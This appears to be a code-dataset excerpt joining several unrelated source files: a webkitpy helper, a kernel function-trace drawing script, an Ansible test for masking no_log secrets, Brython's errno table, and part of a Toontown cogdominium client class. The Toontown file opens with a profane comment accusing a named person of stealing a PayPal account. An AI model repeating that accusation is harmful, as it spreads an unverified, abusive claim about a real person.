# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import urllib2
from webkitpy.common.net.networktransaction import NetworkTransaction
class Web(object):
def get_binary(self, url, convert_404_to_None=False):
return NetworkTransaction(convert_404_to_None=convert_404_to_None).run(lambda: urllib2.urlopen(url).read())
| bsd-3-clause |
cj360/android_kernel_lge_g3 | scripts/tracing/draw_functrace.py | 14676 | 3560 | #!/usr/bin/python
"""
Copyright 2008 (c) Frederic Weisbecker <fweisbec@gmail.com>
Licensed under the terms of the GNU GPL License version 2
This script parses a trace provided by the function tracer in
kernel/trace/trace_functions.c
The resulted trace is processed into a tree to produce a more human
view of the call stack by drawing textual but hierarchical tree of
calls. Only the functions's names and the the call time are provided.
Usage:
Be sure that you have CONFIG_FUNCTION_TRACER
# mount -t debugfs nodev /sys/kernel/debug
# echo function > /sys/kernel/debug/tracing/current_tracer
$ cat /sys/kernel/debug/tracing/trace_pipe > ~/raw_trace_func
Wait some times but not too much, the script is a bit slow.
Break the pipe (Ctrl + Z)
$ scripts/draw_functrace.py < raw_trace_func > draw_functrace
Then you have your drawn trace in draw_functrace
"""
import sys, re
class CallTree:
""" This class provides a tree representation of the functions
call stack. If a function has no parent in the kernel (interrupt,
syscall, kernel thread...) then it is attached to a virtual parent
called ROOT.
"""
ROOT = None
def __init__(self, func, time = None, parent = None):
self._func = func
self._time = time
if parent is None:
self._parent = CallTree.ROOT
else:
self._parent = parent
self._children = []
def calls(self, func, calltime):
""" If a function calls another one, call this method to insert it
into the tree at the appropriate place.
@return: A reference to the newly created child node.
"""
child = CallTree(func, calltime, self)
self._children.append(child)
return child
def getParent(self, func):
""" Retrieve the last parent of the current node that
has the name given by func. If this function is not
on a parent, then create it as new child of root
@return: A reference to the parent.
"""
tree = self
while tree != CallTree.ROOT and tree._func != func:
tree = tree._parent
if tree == CallTree.ROOT:
child = CallTree.ROOT.calls(func, None)
return child
return tree
def __repr__(self):
return self.__toString("", True)
def __toString(self, branch, lastChild):
if self._time is not None:
s = "%s----%s (%s)\n" % (branch, self._func, self._time)
else:
s = "%s----%s\n" % (branch, self._func)
i = 0
if lastChild:
branch = branch[:-1] + " "
while i < len(self._children):
if i != len(self._children) - 1:
s += "%s" % self._children[i].__toString(branch +\
" |", False)
else:
s += "%s" % self._children[i].__toString(branch +\
" |", True)
i += 1
return s
class BrokenLineException(Exception):
"""If the last line is not complete because of the pipe breakage,
we want to stop the processing and ignore this line.
"""
pass
class CommentLineException(Exception):
""" If the line is a comment (as in the beginning of the trace file),
just ignore it.
"""
pass
def parseLine(line):
line = line.strip()
if line.startswith("#"):
raise CommentLineException
m = re.match("[^]]+?\\] +([0-9.]+): (\\w+) <-(\\w+)", line)
if m is None:
raise BrokenLineException
return (m.group(1), m.group(2), m.group(3))
def main():
CallTree.ROOT = CallTree("Root (Nowhere)", None, None)
tree = CallTree.ROOT
for line in sys.stdin:
try:
calltime, callee, caller = parseLine(line)
except BrokenLineException:
break
except CommentLineException:
continue
tree = tree.getParent(caller)
tree = tree.calls(callee, calltime)
print CallTree.ROOT
if __name__ == "__main__":
main()
| gpl-2.0 |
detiber/ansible | test/units/module_utils/basic/test_exit_json.py | 66 | 7332 | # -*- coding: utf-8 -*-
# (c) 2015, Toshio Kuratomi <tkuratomi@ansible.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division)
__metaclass__ = type
import copy
import json
import sys
from ansible.compat.tests import unittest
from units.mock.procenv import swap_stdin_and_argv, swap_stdout
from ansible.module_utils import basic
empty_invocation = {u'module_args': {}}
class TestAnsibleModuleExitJson(unittest.TestCase):
def setUp(self):
args = json.dumps(dict(ANSIBLE_MODULE_ARGS={}))
self.stdin_swap_ctx = swap_stdin_and_argv(stdin_data=args)
self.stdin_swap_ctx.__enter__()
# since we can't use context managers and "with" without overriding run(), call them directly
self.stdout_swap_ctx = swap_stdout()
self.fake_stream = self.stdout_swap_ctx.__enter__()
basic._ANSIBLE_ARGS = None
self.module = basic.AnsibleModule(argument_spec=dict())
def tearDown(self):
# since we can't use context managers and "with" without overriding run(), call them directly to clean up
self.stdin_swap_ctx.__exit__(None, None, None)
self.stdout_swap_ctx.__exit__(None, None, None)
def test_exit_json_no_args_exits(self):
with self.assertRaises(SystemExit) as ctx:
self.module.exit_json()
if isinstance(ctx.exception, int):
# Python2.6... why does sys.exit behave this way?
self.assertEquals(ctx.exception, 0)
else:
self.assertEquals(ctx.exception.code, 0)
return_val = json.loads(self.fake_stream.getvalue())
self.assertEquals(return_val, dict(changed=False, invocation=empty_invocation))
def test_exit_json_args_exits(self):
with self.assertRaises(SystemExit) as ctx:
self.module.exit_json(msg='message')
if isinstance(ctx.exception, int):
# Python2.6... why does sys.exit behave this way?
self.assertEquals(ctx.exception, 0)
else:
self.assertEquals(ctx.exception.code, 0)
return_val = json.loads(self.fake_stream.getvalue())
self.assertEquals(return_val, dict(msg="message", changed=False, invocation=empty_invocation))
def test_fail_json_exits(self):
with self.assertRaises(SystemExit) as ctx:
self.module.fail_json(msg='message')
if isinstance(ctx.exception, int):
# Python2.6... why does sys.exit behave this way?
self.assertEquals(ctx.exception, 1)
else:
self.assertEquals(ctx.exception.code, 1)
return_val = json.loads(self.fake_stream.getvalue())
self.assertEquals(return_val, dict(msg="message", failed=True, invocation=empty_invocation))
def test_exit_json_proper_changed(self):
with self.assertRaises(SystemExit) as ctx:
self.module.exit_json(changed=True, msg='success')
return_val = json.loads(self.fake_stream.getvalue())
self.assertEquals(return_val, dict(changed=True, msg='success', invocation=empty_invocation))
class TestAnsibleModuleExitValuesRemoved(unittest.TestCase):
OMIT = 'VALUE_SPECIFIED_IN_NO_LOG_PARAMETER'
dataset = (
(dict(username='person', password='$ecret k3y'),
dict(one=1, pwd='$ecret k3y', url='https://username:password12345@foo.com/login/',
not_secret='following the leader', msg='here'),
dict(one=1, pwd=OMIT, url='https://username:password12345@foo.com/login/',
not_secret='following the leader', changed=False, msg='here',
invocation=dict(module_args=dict(password=OMIT, token=None, username='person'))),
),
(dict(username='person', password='password12345'),
dict(one=1, pwd='$ecret k3y', url='https://username:password12345@foo.com/login/',
not_secret='following the leader', msg='here'),
dict(one=1, pwd='$ecret k3y', url='https://username:********@foo.com/login/',
not_secret='following the leader', changed=False, msg='here',
invocation=dict(module_args=dict(password=OMIT, token=None, username='person'))),
),
(dict(username='person', password='$ecret k3y'),
dict(one=1, pwd='$ecret k3y', url='https://username:$ecret k3y@foo.com/login/',
not_secret='following the leader', msg='here'),
dict(one=1, pwd=OMIT, url='https://username:********@foo.com/login/',
not_secret='following the leader', changed=False, msg='here',
invocation=dict(module_args=dict(password=OMIT, token=None, username='person'))),
),
)
def test_exit_json_removes_values(self):
self.maxDiff = None
for args, return_val, expected in self.dataset:
params = dict(ANSIBLE_MODULE_ARGS=args)
params = json.dumps(params)
with swap_stdin_and_argv(stdin_data=params):
with swap_stdout():
basic._ANSIBLE_ARGS = None
module = basic.AnsibleModule(
argument_spec = dict(
username=dict(),
password=dict(no_log=True),
token=dict(no_log=True),
),
)
with self.assertRaises(SystemExit) as ctx:
self.assertEquals(module.exit_json(**return_val), expected)
self.assertEquals(json.loads(sys.stdout.getvalue()), expected)
def test_fail_json_removes_values(self):
self.maxDiff = None
for args, return_val, expected in self.dataset:
expected = copy.deepcopy(expected)
del expected['changed']
expected['failed'] = True
params = dict(ANSIBLE_MODULE_ARGS=args)
params = json.dumps(params)
with swap_stdin_and_argv(stdin_data=params):
with swap_stdout():
basic._ANSIBLE_ARGS = None
module = basic.AnsibleModule(
argument_spec = dict(
username=dict(),
password=dict(no_log=True),
token=dict(no_log=True),
),
)
with self.assertRaises(SystemExit) as ctx:
self.assertEquals(module.fail_json(**return_val), expected)
self.assertEquals(json.loads(sys.stdout.getvalue()), expected)
| gpl-3.0 |
40223119/-2015cd_midterm | static/Brython3.1.1-20150328-091302/Lib/errno.py | 624 | 4096 | """
This module makes available standard errno system symbols.
The value of each symbol is the corresponding integer value,
e.g., on most systems, errno.ENOENT equals the integer 2.
The dictionary errno.errorcode maps numeric codes to symbol names,
e.g., errno.errorcode[2] could be the string 'ENOENT'.
Symbols that are not relevant to the underlying system are not defined.
To map error codes to error messages, use the function os.strerror(),
e.g. os.strerror(2) could return 'No such file or directory'.
"""
errorcode= {1: 'EPERM', 2: 'ENOENT', 3: 'ESRCH', 4: 'EINTR', 5: 'EIO',
6: 'ENXIO', 7: 'E2BIG', 8: 'ENOEXEC', 9: 'EBADF', 10: 'ECHILD', 11: 'EAGAIN',
12: 'ENOMEM', 13: 'EACCES', 14: 'EFAULT', 15: 'ENOTBLK', 16: 'EBUSY',
17: 'EEXIST', 18: 'EXDEV', 19: 'ENODEV', 20: 'ENOTDIR', 21: 'EISDIR',
22: 'EINVAL', 23: 'ENFILE', 24: 'EMFILE', 25: 'ENOTTY', 26: 'ETXTBSY',
27: 'EFBIG', 28: 'ENOSPC', 29: 'ESPIPE', 30: 'EROFS', 31: 'EMLINK',
32: 'EPIPE', 33: 'EDOM', 34: 'ERANGE', 35: 'EDEADLOCK', 36: 'ENAMETOOLONG',
37: 'ENOLCK', 38: 'ENOSYS', 39: 'ENOTEMPTY', 40: 'ELOOP', 42: 'ENOMSG',
43: 'EIDRM', 44: 'ECHRNG', 45: 'EL2NSYNC', 46: 'EL3HLT', 47: 'EL3RST',
48: 'ELNRNG', 49: 'EUNATCH', 50: 'ENOCSI', 51: 'EL2HLT', 52: 'EBADE',
53: 'EBADR', 54: 'EXFULL', 55: 'ENOANO', 56: 'EBADRQC', 57: 'EBADSLT',
59: 'EBFONT', 60: 'ENOSTR', 61: 'ENODATA', 62: 'ETIME', 63: 'ENOSR',
64: 'ENONET', 65: 'ENOPKG', 66: 'EREMOTE', 67: 'ENOLINK', 68: 'EADV',
69: 'ESRMNT', 70: 'ECOMM', 71: 'EPROTO', 72: 'EMULTIHOP', 73: 'EDOTDOT',
74: 'EBADMSG', 75: 'EOVERFLOW', 76: 'ENOTUNIQ', 77: 'EBADFD', 78: 'EREMCHG',
79: 'ELIBACC', 80: 'ELIBBAD', 81: 'ELIBSCN', 82: 'ELIBMAX', 83: 'ELIBEXEC',
84: 'EILSEQ', 85: 'ERESTART', 86: 'ESTRPIPE', 87: 'EUSERS', 88: 'ENOTSOCK',
89: 'EDESTADDRREQ', 90: 'EMSGSIZE', 91: 'EPROTOTYPE', 92: 'ENOPROTOOPT',
93: 'EPROTONOSUPPORT', 94: 'ESOCKTNOSUPPORT', 95: 'ENOTSUP',
96: 'EPFNOSUPPORT', 97: 'EAFNOSUPPORT', 98: 'EADDRINUSE',
99: 'EADDRNOTAVAIL', 100: 'ENETDOWN', 101: 'ENETUNREACH', 102: 'ENETRESET',
103: 'ECONNABORTED', 104: 'ECONNRESET', 105: 'ENOBUFS', 106: 'EISCONN',
107: 'ENOTCONN', 108: 'ESHUTDOWN', 109: 'ETOOMANYREFS', 110: 'ETIMEDOUT',
111: 'ECONNREFUSED', 112: 'EHOSTDOWN', 113: 'EHOSTUNREACH', 114: 'EALREADY',
115: 'EINPROGRESS', 116: 'ESTALE', 117: 'EUCLEAN', 118: 'ENOTNAM',
119: 'ENAVAIL', 120: 'EISNAM', 121: 'EREMOTEIO', 122: 'EDQUOT',
123: 'ENOMEDIUM', 124: 'EMEDIUMTYPE', 125: 'ECANCELED', 126: 'ENOKEY',
127: 'EKEYEXPIRED', 128: 'EKEYREVOKED', 129: 'EKEYREJECTED',
130: 'EOWNERDEAD', 131: 'ENOTRECOVERABLE', 132: 'ERFKILL'}
EPERM=1
ENOENT=2
ESRCH=3
EINTR=4
EIO=5
ENXIO=6
E2BIG=7
ENOEXEC=8
EBADF=9
ECHILD=10
EAGAIN=11
ENOMEM=12
EACCES=13
EFAULT=14
ENOTBLK=15
EBUSY=16
EEXIST=17
EXDEV=18
ENODEV=19
ENOTDIR=20
EISDIR=21
EINVAL=22
ENFILE=23
EMFILE=24
ENOTTY=25
ETXTBSY=26
EFBIG=27
ENOSPC=28
ESPIPE=29
EROFS=30
EMLINK=31
EPIPE=32
EDOM=33
ERANGE=34
EDEADLOCK=35
ENAMETOOLONG=36
ENOLCK=37
ENOSYS=38
ENOTEMPTY=39
ELOOP=40
ENOMSG=42
EIDRM=43
ECHRNG=44
EL2NSYNC=45
EL3HLT=46
EL3RST=47
ELNRNG=48
EUNATCH=49
ENOCSI=50
EL2HLT=51
EBADE=52
EBADR=53
EXFULL=54
ENOANO=55
EBADRQC=56
EBADSLT=57
EBFONT=59
ENOSTR=60
ENODATA=61
ETIME=62
ENOSR=63
ENONET=64
ENOPKG=65
EREMOTE=66
ENOLINK=67
EADV=68
ESRMNT=69
ECOMM=70
EPROTO=71
EMULTIHOP=72
EDOTDOT=73
EBADMSG=74
EOVERFLOW=75
ENOTUNIQ=76
EBADFD=77
EREMCHG=78
ELIBACC=79
ELIBBAD=80
ELIBSCN=81
ELIBMAX=82
ELIBEXEC=83
EILSEQ=84
ERESTART=85
ESTRPIPE=86
EUSERS=87
ENOTSOCK=88
EDESTADDRREQ=89
EMSGSIZE=90
EPROTOTYPE=91
ENOPROTOOPT=92
EPROTONOSUPPORT=93
ESOCKTNOSUPPORT=94
ENOTSUP=95
EPFNOSUPPORT=96
EAFNOSUPPORT=97
EADDRINUSE=98
EADDRNOTAVAIL=99
ENETDOWN=100
ENETUNREACH=101
ENETRESET=102
ECONNABORTED=103
ECONNRESET=104
ENOBUFS=105
EISCONN=106
ENOTCONN=107
ESHUTDOWN=108
ETOOMANYREFS=109
ETIMEDOUT=110
ECONNREFUSED=111
EHOSTDOWN=112
EHOSTUNREACH=113
EALREADY=114
EINPROGRESS=115
ESTALE=116
EUCLEAN=117
ENOTNAM=118
ENAVAIL=119
EISNAM=120
EREMOTEIO=121
EDQUOT=122
ENOMEDIUM=123
EMEDIUMTYPE=124
ECANCELED=125
ENOKEY=126
EKEYEXPIRED=127
EKEYREVOKED=128
EKEYREJECTED=129
EOWNERDEAD=130
ENOTRECOVERABLE=131
ERFKILL=132
| gpl-3.0 |
DedMemez/ODS-August-2017 | cogdominium/DistributedCogdoInterior.py | 1 | 35276 | # Fuck you Disyer. Stealing my fucking paypal. GET FUCKED: toontown.cogdominium.DistributedCogdoInterior
from panda3d.core import Lens, Light, Point3, VBase3, Vec3, Vec4, headsUp
import random
from direct.interval.IntervalGlobal import *
from direct.distributed.ClockDelta import *
from toontown.building.ElevatorConstants import *
from toontown.toon import NPCToons
from toontown.building import ElevatorUtils
from toontown.toonbase import ToontownGlobals
from toontown.toonbase import ToontownBattleGlobals
from direct.directnotify import DirectNotifyGlobal
from direct.fsm import ClassicFSM, State
from direct.distributed import DistributedObject
from direct.fsm import State
from direct.fsm.StatePush import StateVar, FunctionCall
from toontown.battle import BattleBase
from toontown.hood import ZoneUtil
from toontown.cogdominium.CogdoLayout import CogdoLayout
from toontown.cogdominium import CogdoGameConsts
from toontown.cogdominium import CogdoBarrelRoom, CogdoBarrelRoomConsts
from toontown.distributed import DelayDelete
from toontown.toonbase import TTLocalizer
from CogdoExecutiveSuiteMovies import CogdoExecutiveSuiteIntro
from CogdoBarrelRoomMovies import CogdoBarrelRoomIntro
from CogdoElevatorMovie import CogdoElevatorMovie
SUITE_DICT = {'s': 'tt_m_ara_crg_penthouse_sell',
'l': 'tt_m_ara_crg_penthouse_law',
'm': 'tt_m_ara_crg_penthouse_sell',
'c': 'tt_m_ara_crg_penthouse_sell'}
PAINTING_DICT = {'s': 'tt_m_ara_crg_paintingMoverShaker',
'l': 'tt_m_ara_crg_paintingLegalEagle',
'm': 'tt_m_ara_crg_paintingMoverShaker',
'c': 'tt_m_ara_crg_paintingMoverShaker'}
from otp.nametag.NametagConstants import *
class DistributedCogdoInterior(DistributedObject.DistributedObject):
id = 0
cageHeights = [11.36, 0.01]
def __init__(self, cr):
DistributedObject.DistributedObject.__init__(self, cr)
self.toons = []
self.activeIntervals = {}
self.openSfx = loader.loadSfx('phase_5/audio/sfx/elevator_door_open.ogg')
self.closeSfx = loader.loadSfx('phase_5/audio/sfx/elevator_door_close.ogg')
self.suits = []
self.reserveSuits = []
self.joiningReserves = []
self.distBldgDoId = None
self._CogdoGameRepeat = config.GetBool('cogdo-game-repeat', 0)
self.currentFloor = -1
self.elevatorName = self.__uniqueName('elevator')
self.floorModel = None
self.elevatorOutOpen = 0
self.BottomFloor_SuitPositions = [Point3(0, 15, 0),
Point3(10, 20, 0),
Point3(-7, 24, 0),
Point3(-10, 0, 0)]
self.BottomFloor_SuitHs = [75,
170,
-91,
-44]
self.Cubicle_SuitPositions = [Point3(0, 18, 0),
Point3(10, 12, 0),
Point3(-9, 11, 0),
Point3(-3, 13, 0)]
self.Cubicle_SuitHs = [170,
56,
-52,
10]
self.BossOffice_SuitPositions = [Point3(0, 15, 0),
Point3(10, 20, 0),
Point3(-10, 6, 0),
Point3(-17, 30, 0)]
self.BossOffice_SuitHs = [170,
120,
12,
38]
self._wantBarrelRoom = config.GetBool('cogdo-want-barrel-room', 1)
self.barrelRoom = CogdoBarrelRoom.CogdoBarrelRoom()
self.brResults = [[], []]
self.barrelRoomIntroTrack = None
self.penthouseOutroTrack = None
self.penthouseOutroChatDoneTrack = None
self.penthouseIntroTrack = None
self.waitMusic = loader.loadMusic('phase_7/audio/bgm/encntr_toon_winning_indoor.ogg')
self.elevatorMusic = loader.loadMusic('phase_7/audio/bgm/tt_elevator.ogg')
self.fsm = ClassicFSM.ClassicFSM('DistributedCogdoInterior', [State.State('WaitForAllToonsInside', self.enterWaitForAllToonsInside, self.exitWaitForAllToonsInside, ['Elevator']),
State.State('Elevator', self.enterElevator, self.exitElevator, ['Game', 'BattleIntro', 'BarrelRoomIntro']),
State.State('Game', self.enterGame, self.exitGame, ['Resting',
'Failed',
'BattleIntro',
'BarrelRoomIntro',
'Elevator']),
State.State('BarrelRoomIntro', self.enterBarrelRoomIntro, self.exitBarrelRoomIntro, ['CollectBarrels', 'Off']),
State.State('CollectBarrels', self.enterCollectBarrels, self.exitCollectBarrels, ['BarrelRoomReward', 'Off']),
State.State('BarrelRoomReward', self.enterBarrelRoomReward, self.exitBarrelRoomReward, ['Battle',
'ReservesJoining',
'BattleIntro',
'Off']),
State.State('BattleIntro', self.enterBattleIntro, self.exitBattleIntro, ['Battle', 'ReservesJoining', 'Off']),
State.State('Battle', self.enterBattle, self.exitBattle, ['Resting', 'Reward', 'ReservesJoining']),
State.State('ReservesJoining', self.enterReservesJoining, self.exitReservesJoining, ['Battle']),
State.State('Resting', self.enterResting, self.exitResting, ['Elevator']),
State.State('Reward', self.enterReward, self.exitReward, ['Off']),
State.State('Failed', self.enterFailed, self.exitFailed, ['Off']),
State.State('Off', self.enterOff, self.exitOff, ['Elevator', 'WaitForAllToonsInside', 'Battle'])], 'Off', 'Off')
self.fsm.enterInitialState()
self._haveEntranceElevator = StateVar(False)
self._stashEntranceElevator = StateVar(False)
self._stashEntranceElevatorFC = FunctionCall(self._doStashEntranceElevator, self._haveEntranceElevator, self._stashEntranceElevator)
self._entranceElevCallbacks = []
self._doEntranceElevCallbacksFC = FunctionCall(self._doEntranceElevCallbacks, self._haveEntranceElevator)
self.cage = None
self.shopOwnerNpcId = None
self.shopOwnerNpc = None
self._movie = None
self.SOSToonName = None
self.FOType = None
return
def setShopOwnerNpcId(self, npcId):
self.shopOwnerNpcId = npcId
def setSOSNpcId(self, npcId):
self.SOSToonName = NPCToons.getNPCName(npcId)
def setFOType(self, typeId):
self.FOType = chr(typeId)
def getFOType(self):
return self.FOType
def __uniqueName(self, name):
DistributedCogdoInterior.id += 1
return name + '%d' % DistributedCogdoInterior.id
def generate(self):
DistributedObject.DistributedObject.generate(self)
self.announceGenerateName = self.uniqueName('generate')
self.accept(self.announceGenerateName, self.handleAnnounceGenerate)
self.elevatorModelIn = loader.loadModel('phase_5/models/cogdominium/tt_m_ara_csa_elevatorB')
self.leftDoorIn = self.elevatorModelIn.find('**/left_door')
self.rightDoorIn = self.elevatorModelIn.find('**/right_door')
self.elevatorModelOut = loader.loadModel('phase_5/models/cogdominium/tt_m_ara_csa_elevator')
self.leftDoorOut = self.elevatorModelOut.find('**/left_door')
self.rightDoorOut = self.elevatorModelOut.find('**/right_door')
def __makeShopOwnerNpc(self):
if self.shopOwnerNpc:
return
self.shopOwnerNpc = NPCToons.createLocalNPC(self.shopOwnerNpcId)
if not self.shopOwnerNpc:
self.notify.warning('No shopkeeper in this cogdominium.')
random.seed(self.doId)
shopkeeper = random.choice(NPCToons.NPCToonNames.keys())
self.shopOwnerNpc = NPCToons.createLocalNPC(shopkeeper)
self.shopOwnerNpc.addActive()
self.shopOwnerNpc.reparentTo(self.cage)
self.shopOwnerNpc.setPosHpr(0, -2, 0, 180, 0, 0)
self.shopOwnerNpc.loop('neutral')
def setElevatorLights(self, elevatorModel):
npc = elevatorModel.findAllMatches('**/floor_light_?;+s')
for i in xrange(npc.getNumPaths()):
np = npc.getPath(i)
np.setDepthOffset(120)
floor = int(np.getName()[-1:]) - 1
if floor == self.currentFloor:
np.setColor(LIGHT_ON_COLOR)
elif floor < self.layout.getNumGameFloors() + (1 if self.FOType != 's' else 0):
if self.isBossFloor(self.currentFloor):
np.setColor(LIGHT_ON_COLOR)
else:
np.setColor(LIGHT_OFF_COLOR)
else:
np.hide()
def startAlertElevatorLightIval(self, elevatorModel):
light = elevatorModel.find('**/floor_light_%s' % (self.currentFloor + 1))
track = Sequence(Func(light.setColor, Vec4(1.0, 0.6, 0.6, 1.0)), Wait(0.9), Func(light.setColor, LIGHT_ON_COLOR), Wait(0.9))
self.activeIntervals['alertElevatorLight'] = track
track.loop()
def stopAlertElevatorLightIval(self, elevatorModel):
self.__finishInterval('alertElevatorLight')
self.setElevatorLights(elevatorModel)
def handleAnnounceGenerate(self, obj):
self.ignore(self.announceGenerateName)
self.cageDoorSfx = loader.loadSfx('phase_5/audio/sfx/CHQ_SOS_cage_door.ogg')
self.cageLowerSfx = loader.loadSfx('phase_5/audio/sfx/CHQ_SOS_cage_lower.ogg')
self.sendUpdate('setAvatarJoined', [])
def disable(self):
self.fsm.requestFinalState()
self.__cleanupIntervals()
self.ignoreAll()
self.__cleanup()
self.__cleanupShopOwnerNpc()
self.__cleanupPenthouseIntro()
DistributedObject.DistributedObject.disable(self)
def __cleanupShopOwnerNpc(self):
if self.shopOwnerNpc:
self.shopOwnerNpc.removeActive()
self.shopOwnerNpc.delete()
self.shopOwnerNpc = None
return
def __cleanupPenthouseIntro(self):
if hasattr(self, '_movie') and self._movie:
self._movie.unload()
self._movie = None
return
def delete(self):
self._stashEntranceElevatorFC.destroy()
self._doEntranceElevCallbacksFC.destroy()
self._haveEntranceElevator.destroy()
self._stashEntranceElevator.destroy()
self._entranceElevCallbacks = None
del self.waitMusic
del self.elevatorMusic
del self.openSfx
del self.closeSfx
del self.fsm
DistributedObject.DistributedObject.delete(self)
return
def isBossFloor(self, floorNum):
return self.layout.hasBossBattle() and self.layout.getBossBattleFloor() + 0 == floorNum
def __cleanup(self):
self.toons = []
self.suits = []
self.reserveSuits = []
self.joiningReserves = []
if self.elevatorModelIn != None:
self.elevatorModelIn.removeNode()
if self.elevatorModelOut != None:
self.elevatorModelOut.removeNode()
if self.floorModel != None:
self.floorModel.removeNode()
if self.cage != None:
self.cage = None
if self.barrelRoom != None:
self.barrelRoom.destroy()
self.barrelRoom = None
self.leftDoorIn = None
self.rightDoorIn = None
self.leftDoorOut = None
self.rightDoorOut = None
return
def __addToon(self, toon):
self.accept(toon.uniqueName('disable'), self.__handleUnexpectedExit, extraArgs=[toon])
def __handleUnexpectedExit(self, toon):
self.notify.warning('handleUnexpectedExit() - toon: %d' % toon.doId)
self.__removeToon(toon, unexpected=1)
def __removeToon(self, toon, unexpected = 0):
if self.toons.count(toon) == 1:
self.toons.remove(toon)
self.ignore(toon.uniqueName('disable'))
def __finishInterval(self, name):
if name in self.activeIntervals:
interval = self.activeIntervals[name]
if interval.isPlaying():
interval.finish()
def __cleanupIntervals(self):
for interval in self.activeIntervals.values():
interval.finish()
self.activeIntervals = {}
def __closeInElevator(self):
self.leftDoorIn.setPos(3.5, 0, 0)
self.rightDoorIn.setPos(-3.5, 0, 0)
def getZoneId(self):
return self.zoneId
def setZoneId(self, zoneId):
self.zoneId = zoneId
def getExtZoneId(self):
return self.extZoneId
def setExtZoneId(self, extZoneId):
self.extZoneId = extZoneId
def getDistBldgDoId(self):
return self.distBldgDoId
def setDistBldgDoId(self, distBldgDoId):
self.distBldgDoId = distBldgDoId
def setNumFloors(self, numFloors):
self.layout = CogdoLayout(numFloors)
def getToonIds(self):
toonIds = []
for toon in self.toons:
toonIds.append(toon.doId)
return toonIds
def setToons(self, toonIds, hack):
self.toonIds = toonIds
oldtoons = self.toons
self.toons = []
for toonId in toonIds:
if toonId != 0:
if toonId in self.cr.doId2do:
toon = self.cr.doId2do[toonId]
toon.stopSmooth()
self.toons.append(toon)
if oldtoons.count(toon) == 0:
self.__addToon(toon)
else:
self.notify.warning('setToons() - no toon: %d' % toonId)
for toon in oldtoons:
if self.toons.count(toon) == 0:
self.__removeToon(toon)
def setSuits(self, suitIds, reserveIds, values):
oldsuits = self.suits
self.suits = []
self.joiningReserves = []
for suitId in suitIds:
if suitId in self.cr.doId2do:
suit = self.cr.doId2do[suitId]
self.suits.append(suit)
suit.fsm.request('Battle')
suit.buildingSuit = 1
suit.reparentTo(render)
if oldsuits.count(suit) == 0:
self.joiningReserves.append(suit)
if 'Elevator' in repr(self.fsm):
pos, h = BattleBase.BattleBase.suitPoints[len(suitIds) - 1][suitIds.index(suitId)]
suit.setPos(pos)
suit.setH(h)
else:
self.notify.warning('setSuits() - no suit: %d' % suitId)
self.reserveSuits = []
for index in xrange(len(reserveIds)):
suitId = reserveIds[index]
if suitId in self.cr.doId2do:
suit = self.cr.doId2do[suitId]
self.reserveSuits.append((suit, values[index]))
else:
self.notify.warning('setSuits() - no suit: %d' % suitId)
if len(self.joiningReserves) > 0:
self.fsm.request('ReservesJoining')
def setState(self, state, timestamp):
self.fsm.request(state, [globalClockDelta.localElapsedTime(timestamp)])
def stashElevatorIn(self, stash = True):
self._stashEntranceElevator.set(stash)
def getEntranceElevator(self, callback):
if self._haveEntranceElevator.get():
callback(self.elevIn)
else:
self._entranceElevCallbacks.append(callback)
def _doEntranceElevCallbacks(self, haveElev):
if haveElev:
while len(self._entranceElevCallbacks):
cbs = self._entranceElevCallbacks[:]
self._entranceElevCallbacks = []
for callback in cbs:
callback(self.elevIn)
def _doStashEntranceElevator(self, haveElev, doStash):
if haveElev:
if doStash:
self.elevIn.stash()
else:
self.elevIn.unstash()
def d_elevatorDone(self):
self.sendUpdate('elevatorDone', [])
def d_reserveJoinDone(self):
self.sendUpdate('reserveJoinDone', [])
def enterOff(self, ts = 0):
messenger.send('sellbotFieldOfficeChanged', [False])
def exitOff(self):
return None
def enterWaitForAllToonsInside(self, ts = 0):
base.transitions.fadeOut(0)
def exitWaitForAllToonsInside(self):
return None
def enterGame(self, ts = 0):
base.cr.forbidCheesyEffects(1)
def exitGame(self):
base.cr.forbidCheesyEffects(0)
def __playElevator(self, ts, name, callback):
SuitHs = []
SuitPositions = []
if self.floorModel:
self.floorModel.removeNode()
self.floorModel = None
if self.cage:
self.cage = None
if self.currentFloor == 0:
SuitHs = self.BottomFloor_SuitHs
SuitPositions = self.BottomFloor_SuitPositions
if self.isBossFloor(self.currentFloor):
self.notify.info('__playElevator: currentFloor %s is boss' % self.currentFloor)
self.barrelRoom.unload()
if self.FOType:
penthouseName = SUITE_DICT.get(self.FOType)
for i in xrange(4):
self.floorModel = loader.loadModel('phase_5/models/cogdominium/%s' % penthouseName)
self.cage = self.floorModel.find('**/cage')
pos = self.cage.getPos()
self.cagePos = []
for height in self.cageHeights:
self.cagePos.append(Point3(pos[0], pos[1], height))
self.cageDoor = self.floorModel.find('**/cage_door')
self.cageDoor.wrtReparentTo(self.cage)
if self.FOType:
paintingModelName = PAINTING_DICT.get(self.FOType)
for i in xrange(4):
paintingModel = loader.loadModel('phase_5/models/cogdominium/%s' % paintingModelName)
loc = self.floorModel.find('**/loc_painting%d' % (i + 1))
paintingModel.reparentTo(loc)
if not self.floorModel.find('**/trophyCase').isEmpty():
for i in xrange(4):
goldEmblem = loader.loadModel('phase_5/models/cogdominium/tt_m_ara_crg_goldTrophy')
loc = self.floorModel.find('**/gold_0%d' % (i + 1))
goldEmblem.reparentTo(loc)
for i in xrange(20):
silverEmblem = loader.loadModel('phase_5/models/cogdominium/tt_m_ara_crg_silverTrophy')
loc = self.floorModel.find('**/silver_0%d' % (i + 1))
silverEmblem.reparentTo(loc)
SuitHs = self.BossOffice_SuitHs
SuitPositions = self.BossOffice_SuitPositions
self.__makeShopOwnerNpc()
else:
if self._wantBarrelRoom:
self.barrelRoom.load()
self.barrelRoom.hide()
SuitHs = self.Cubicle_SuitHs
SuitPositions = self.Cubicle_SuitPositions
if self.floorModel:
self.floorModel.reparentTo(render)
if self.isBossFloor(self.currentFloor):
self.notify.info('Load boss_suit_office')
elevIn = self.floorModel.find(CogdoGameConsts.PenthouseElevatorInPath).copyTo(render)
